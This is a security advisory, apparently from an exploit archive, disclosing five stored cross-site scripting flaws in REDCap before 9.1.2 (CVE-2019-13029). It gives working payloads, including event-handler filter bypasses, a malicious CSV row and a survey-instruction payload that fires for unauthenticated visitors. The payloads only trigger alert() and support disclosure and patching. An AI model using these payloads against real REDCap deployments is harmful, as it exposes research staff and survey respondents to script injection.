ExploitFixes
REDCap < 9.1.2 - Cross-Site Scripting 2019-07-19 12:17:49

# Exploit Title: REDCap &lt; 9.1.2 - Cross-Site Scripting
# Date: 2019-07-19
# Exploit Author: Dylan GARNAUD &amp; Alexandre ZANNI (https://pwn.by/noraj) - Pentesters from Orange Cyberdefense France
# Vendor Homepage: https://projectredcap.org
# Software Link: https://projectredcap.org
# Version: Redcap 9.x.x before 9.1.2 and 8.x.x before 8.10.2
# Tested on: 9.1.0
# CVE: CVE-2019-13029
# Security advisory: https://gitlab.com/snippets/1874216

### Stored XSS n&deg;1 &ndash; Project name (found by Dylan GARNAUD)

Most JavaScript event are blacklisted but not all. As a result we found one event that was not blacklisted and successfully used it.

- Where? In project name
- Payload: `&lt;BODY onKeyPress=alert(&quot;xss&quot;)&gt;`
- Details: Since it is an *onkeypress* event, it is triggered whenever the user touch any key and since the XSS payload is stored in the project name it appears in several pages.
- Privileges: It requires admin privileges to store it.
- Location example: https://redcap.XXX/redcap/redcap_v9.1.0/ProjectSetup/index.php?pid=16&amp;msg=projectmodified

### Stored XSS n&deg;2 &ndash; Calendar (found by Dylan GARNAUD)

- Where? Calendar event
- Payload: `&lt;BODY onKeyPress=alert(&quot;xss&quot;)&gt;`
- Privileges: It requires admin privileges to store it.
- Location example: https://redcap.XXX/redcap/redcap_v9.1.0/Calendar/index.php?pid=16&amp;view=week&amp;month=7&amp;year=2019&amp;day=12

### Stored XSS n&deg;3 &ndash; CSV upload (found by Dylan GARNAUD)

- Where? Wherever there is a CSV upload feature with displayed parsed results
- Payload:
```csv
record_id,my_first_instrument_complete,body_onkeypressalertxssinstrumetn_complete
&lt;script&gt;alert(&quot;upload xss&quot;)&lt;/script&gt;,,
```
- Details: Once the malicious CSV is uploaded, the parsed content is inserted into a HTML table where the XSS will be triggered.
- Privileges: It requires admin privileges to store it.
- URL examples of execution:
+ https://redcap.XXX/redcap/redcap_v9.1.0/index.php?pid=16&amp;route=DataComparisonController:index
+ https://redcap.XXX/redcap/redcap_v9.1.0/DataQuality/index.php?pid=16

### Stored XSS n&deg;4 &ndash; Survey queue (found by Alexandre ZANNI)

- Where? In the Survey Queue (choose a Projet &gt; Project Home and Design &gt; Design &gt; Survey Queue)
- Payload: `&lt;/textarea&gt;&lt;svg/onload='alert(&quot;XSS survey queue&quot;)'&gt;`
- Privileges: It requires admin privileges to store it.
- Location example: https://redcap.XXX/redcap/redcap_v9.1.0/Design/online_designer.php?pid=16

### Stored XSS n&deg;5 &ndash; Survey (found by Alexandre ZANNI)

- Where? In the survey management system.
+ Store: One has to select a project, go in the *Designer* section, choose *Survey Settings* and then store the payload in the WYSIWYG editor section named *Survey Instructions* (the same happens for *Survey Completion Text*).
+ Execute: Anyone who consults the survey, for example https://redcap.XXX/redcap/surveys/?s=88XF8CRJH4, will trigger the XSS.
- Payload:
```html
&lt;HTML&gt;&lt;BODY&gt;&lt;?xml:namespace prefix=&quot;t&quot; ns=&quot;urn:schemas-microsoft-com:time&quot;&gt;&lt;?import namespace=&quot;t&quot; implementation=&quot;#default#time2&quot;&gt;&lt;t:set attributeName=&quot;innerHTML&quot; to=&quot;XSS&lt;SCRIPT DEFER&gt;javascript:alert('Survey XSS')&lt;/SCRIPT&gt;&quot;&gt;&lt;/BODY&gt;&lt;/HTML&gt;
```
- Privileges:
+ Store: It requires admin privileges to store it.
+ Execute: Any unauthenticated user that can consult a survey.